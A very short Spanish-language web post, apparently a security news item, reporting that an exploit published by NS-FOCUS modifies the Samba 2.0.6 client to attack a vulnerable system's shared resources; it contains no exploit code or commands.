El exploit que proporciona NS-FOCUS en su WEB modifica el cliente de samba en su versión 2.0.6 para atacar los recursos compartidos de un sistema vulnerable.
Publicar un comentario